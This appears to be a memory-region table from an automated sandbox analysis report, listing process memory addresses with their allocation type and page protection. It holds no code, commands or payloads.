7FFB4A1C0000
trusted library allocation
page read and write
21AE47E0000
heap
page read and write
7FFB4A0C0000
trusted library allocation
page read and write
7FFB4A1C0000
trusted library allocation
page read and write
28E7A4FC000
heap
page read and write
19C5A14C000
trusted library allocation
page read and write
28E7A026000
heap
page read and write
28E7850B000
heap
page read and write
372C93E000
stack
page read and write
21AFE81D000
heap
page read and write
21AFE9E0000
heap
page read and write
28E7854E000
heap
page read and write
7FFB49ED0000
trusted library allocation
page read and write
2024BBD0000
heap
page read and write
19C57E87000
heap
page read and write
7FFB4A0E0000
trusted library allocation
page read and write
2E80000
heap
page read and write
21AFEC30000
heap
page read and write
28E78499000
heap
page read and write
21AE4900000
heap
page read and write
7FFB4A1D0000
trusted library allocation
page read and write
7FFB49F80000
trusted library allocation
page execute and read and write
21AF716A000
trusted library allocation
page read and write
32EE000
stack
page read and write
28E7A006000
heap
page read and write
3340000
direct allocation
page read and write
28E78660000
heap
page read and write
7FFB4A0D0000
trusted library allocation
page read and write
6C0BCFD000
stack
page read and write
28E7A042000
heap
page read and write
2E50000
heap
page read and write
2024DBBE000
trusted library allocation
page read and write
21AE6D47000
trusted library allocation
page read and write
372C5F9000
stack
page read and write
2024DB87000
trusted library allocation
page read and write
21AFE8D6000
heap
page execute and read and write
2024DB61000
trusted library allocation
page read and write
6C0BC72000
stack
page read and write
28E7A034000
heap
page read and write
21AFE750000
heap
page read and write
2024DC64000
trusted library allocation
page read and write
6C0BD7E000
stack
page read and write
28E7854D000
heap
page read and write
2024DBE5000
trusted library allocation
page read and write
19C59F4B000
trusted library allocation
page read and write
3340000
direct allocation
page read and write
E3208FE000
stack
page read and write
28E7A030000
heap
page read and write
21AF7B6A000
trusted library allocation
page read and write
2024DB20000
heap
page execute and read and write
2024DB50000
heap
page execute and read and write
7FFB4A07A000
trusted library allocation
page read and write
2024DBAB000
trusted library allocation
page read and write
There are 576 hidden memdumps, click here to show them.